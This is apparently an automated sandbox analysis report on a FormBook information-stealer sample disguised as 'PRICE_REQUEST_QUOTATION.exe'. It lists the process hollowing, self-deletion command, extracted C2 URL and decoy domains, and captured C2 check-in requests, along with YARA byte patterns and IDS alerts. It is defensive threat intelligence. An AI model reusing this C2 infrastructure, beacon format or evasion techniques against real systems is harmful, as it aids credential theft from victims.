Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Sample Name: PRICE_REQUEST_QUOTATION.exe
Analysis ID: 491948
MD5: 85589170af713a03ca622f94429c634a
SHA1: 4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256: dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • PRICE_REQUEST_QUOTATION.exe (PID: 3952 cmdline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: 85589170AF713A03CA622F94429C634A)
    • PRICE_REQUEST_QUOTATION.exe (PID: 4684 cmdline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: 85589170AF713A03CA622F94429C634A)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 4484 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • wscript.exe (PID: 4960 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 4860 cmdline: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: PRICE_REQUEST_QUOTATION.exe, Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe, ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match, File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc, Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll, ReversingLabs: Detection: 13%
Machine Learning detection for sample
Source: PRICE_REQUEST_QUOTATION.exe, Joe Sandbox ML: detected
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.wscript.exe.c28870.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.wscript.exe.516796c.4.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: PRICE_REQUEST_QUOTATION.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, Code function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, Code function: 0_2_00402671 FindFirstFileA,0_2_00402671

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe, Network Connect: 154.208.173.139 80
Source: C:\Windows\explorer.exe, Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe, Network Connect: 109.106.246.165 80
Source: C:\Windows\explorer.exe, Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe, Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe, Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe, Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe, Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe, Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe, Domain query: www.patrickandmaxine.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.nudesalon.digital/rgoe/
Source: Joe Sandbox View, ASN Name: CNSERVERSUS CNSERVERSUS
Source: global traffic, HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.patrickandmaxine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.teelandcompany.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.nailsestetic.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.futurodr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.babeshotnud.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: PRICE_REQUEST_QUOTATION.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PRICE_REQUEST_QUOTATION.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp, String found in binary or memory: http://survey-smiles.com
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp, String found in binary or memory: https://bitninja.io
Source: unknown, DNS traffic detected: queries for: www.appleluis.host
Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000002.273624416.000000000069A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Each source below matched two rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group).
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
